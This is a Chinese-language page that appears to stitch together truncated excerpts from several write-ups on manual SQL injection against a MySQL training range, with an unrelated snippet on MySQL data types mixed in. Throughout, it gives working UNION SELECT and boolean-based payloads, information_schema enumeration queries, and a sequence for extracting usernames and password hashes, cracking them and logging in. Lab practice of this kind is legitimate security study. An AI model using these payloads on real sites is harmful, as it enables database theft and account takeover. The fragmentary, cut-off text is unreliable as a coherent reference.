information_schema:MySQL自带的数据库,存储了数据库中所有的数据库、表和列信息 information_schema.tables:所有表信息 information_schema.columns:所有列信息 table_schema:数据库名称 table_name:表名称 column_name:列名称 group_concat(table_name):列出所有表名 __EOF__...
回显位置为 2 和 3 爆当前数据库 id=1' union select 1,2,database(),4--+ 得到数据库是 mozhe_discuz_stormgroup 爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+ 得到数据表为 notice,stormgroup_member 爆列名 ...
2.查看当前数据库名和版本 id=' union select '1',database(),version(),'4' --+ 这里命令前面不需要加引号 得到的结果是数据库名为:mozhe_discuz_stormgroup 数据库版本为:10.2.15-MariaDB-log 3.查看当前数据库中的所有表 id=' union select '1',group_concat(table_name),'3','4' from informa...
一开始我直接在tingjigonggao后面加上' union select 1,version(),database(),4 %23发现返回的只有正常页面后来尝试了下发现把tingjigonggao改成1或者其他内容就能返回我们想要的数据库名了,我觉得可能是停机公告是由内容查询出来的所以直接就把标题和内容的位置占据了,把我们想让他显示出来的版本号和数据库名给盖...
先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。 (1. 登录页面没有账号密码,只能暴破或者SQL注入数据库查看帐号密码 2. 发现公告中存在注入点 3. 通过...
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解MySQL的数据结构; 4.了解字符串的MD5加解密; ...
可以看到表名中用了两个反单引号,这是因为有时候数据库的表信息或者字段信息显示出来是key或者是其他的,但是语句没有写错,信息就是显示不出来,那么就在字段或者表的旁边加上反引号,因为MySQL中对有些字符或者保留字做了限制,当命名的时候有些字段存在这些关键字,那么查询的时候就要加上反引号。
MySQL-SQL语句 2019-12-09 11:56 −一、数据类型 1.日期和时间类型 类型 大小 范围 格式 用途 DATE 3 1000-01-01/9999-12-31 YYYY-MM-DD 日期值 TIME 3 -838:59:59/838:59:59 HH:MM:SS 时间值或持续时间 YEAR 1 1901/2155 Y...
SQL手工注入漏洞测试(MySQL数据库-字符型) 查看原文 Sql注入总结 表名’%238、?id=-1’unionselect1,flag,3from数据库.表名%23布尔型:1、判断是否存在注入点?id=1’and...# ?id=1’and1=1#3、猜测字段,?id=1’orderby3%234、找到页面中数据输入点, ?id=-1’unionselect...
SQL手工注入漏洞测试(MySQL数据库) 使用墨者学院靶场测试 先浏览页面判断存在注入 >查长度>查数据库>查表>查字段>查数据数量>查用户+密码>解密登录 找不到可注入点可以观察网页是否可以跳转到其他页面,并重新寻找注入点,查询的时候尽量使用group_concat()防止漏数据。